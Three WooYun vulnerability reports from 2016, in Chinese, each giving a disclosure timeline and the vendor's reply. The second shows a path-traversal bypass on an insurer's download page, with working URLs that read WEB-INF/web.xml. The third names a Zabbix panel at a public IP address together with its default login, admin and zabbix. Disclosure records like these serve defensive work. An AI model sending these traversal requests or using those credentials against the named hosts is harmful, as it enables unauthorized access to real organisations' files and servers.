漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：1详细说明：https://soc.cs-air.com/opws-web/security-Remember-gotoLogin.action 漏洞证明：https://soc.cs-air.com/opws-web/security-Remember-gotoLogin.action 修复方案：o版权声明：转载请注明来源 Jinone@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-27 10:10厂商回复：已经收到，感谢。最新状态：暂无

漏洞详情披露状态： 2016-06-01： 细节已通知厂商并且等待厂商处理中2016-06-01： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-07： 厂商已经主动忽略漏洞，细节向公众公开简要描述：绕过限制下载任意文件详细说明：问题出在此处http://www.e-chinalife.com/product/benefitshow/indexlis.jsp?RiskCode=415构造code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\downloadToHTML.jsp&titleDoc=1 漏洞证明： code 区域if (fileName.indexOf("../")!=-1) { %> <html><body> 访问地址非法！！ </body> </html>仅当路径中出现../的时候提示访问地址非法，所以可以用\来绕过code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\/WEB-INF\/web.xml&titleDoc=1你懂的code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\/sys\/sysLog.jsp&titleDoc=1 修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-07 09:50厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-05-07： 细节已通知厂商并且等待厂商处理中2016-05-07： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-09： 厂商已经主动忽略漏洞，细节向公众公开简要描述：酷派某分站运维不当/导致任意命令执行(可提权/可内网渗透)详细说明：提交到你们CSRC，半个多月了，没有审核！算了，还是提交乌云吧。漏洞证明：http://139.217.22.45/zabbix/账号、密码 Admin / zabbix   security.coolpad.com -->> 139.217.22.44修复方案：修改弱口令~增强安全意识~另外，请加快CSRC的审核步伐！版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-09 09:47厂商回复：此IP及对应业务不属于我司，感谢关注酷派安全。最新状态：暂无